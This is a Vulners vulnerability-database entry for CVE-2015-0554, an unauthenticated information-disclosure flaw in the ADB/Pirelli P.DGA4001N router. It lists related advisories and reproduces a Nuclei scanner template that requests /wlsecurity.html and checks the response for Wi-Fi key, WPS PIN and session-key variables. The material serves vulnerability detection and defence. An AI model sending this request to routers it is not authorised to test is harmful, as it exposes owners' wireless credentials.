Vulners
Lucene search
ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | Pirelli ADSL2/2+ Wireless Router P.DGA4001N Information Disclosure Vulnerability | 7 Jan 201500:00 | – | zdt |
 | Unspecified Vulnerability in ADB P.DGA4001N Router | 23 Jan 201500:00 | – | cnvd |
 | CVE-2015-0554 | 21 Jan 201518:00 | – | cve |
 | CVE-2015-0554 | 21 Jan 201518:00 | – | cvelist |
 | Pirelli Router Information Disclosure | 1 Jun 201500:00 | – | dsquare |
 | Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure | 7 Jan 201500:00 | – | exploitdb |
 | Pirelli ADSL22+ Wireless Router P.DGA4001N - Information Disclosure | 7 Jan 201500:00 | – | exploitpack |
 | CVE-2015-0554 | 21 Jan 201518:59 | – | nvd |
 | Pirelli ADSL2/2+ Wireless Router P.DGA4001N Information Disclosure | 6 Jan 201500:00 | – | packetstorm |
 | Integer overflow | 21 Jan 201518:59 | – | prion |
10
id: CVE-2015-0554
info:
name: ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure
author: daffainfo
severity: critical
description: ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.
impact: |
An attacker can exploit this vulnerability to gain sensitive information from the router.
remediation: |
Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.
reference:
- https://www.exploit-db.com/exploits/35721
- http://packetstormsecurity.com/files/129828/Pirelli-ADSL2-2-Wireless-Router-P.DGA4001N-Information-Disclosure.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-0554
- http://www.exploit-db.com/exploits/35721
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:C
cvss-score: 9.4
cve-id: CVE-2015-0554
cwe-id: CWE-264
epss-score: 0.39797
epss-percentile: 0.9844
cpe: cpe:2.3:o:adb:p.dga4001n_firmware:pdg_tef_sp_4.06l.6:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: adb
product: p.dga4001n_firmware
tags: cve2015,cve,pirelli,router,disclosure,edb,packetstorm,adb,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wlsecurity.html"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "var wpapskkey"
- "var WscDevPin"
- "var sessionkey"
condition: and
- type: status
status:
- 200
# digest: 490a0046304402203f4bcc6f3034754266b3e0c2c733a96b16b4702533ff61b9ac987ecb10a42745022023e48a704a3a5d45b7580c044efc4cecfc279b23cbdafe72bd24ae4450bb9b57:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.4
EPSS0.39797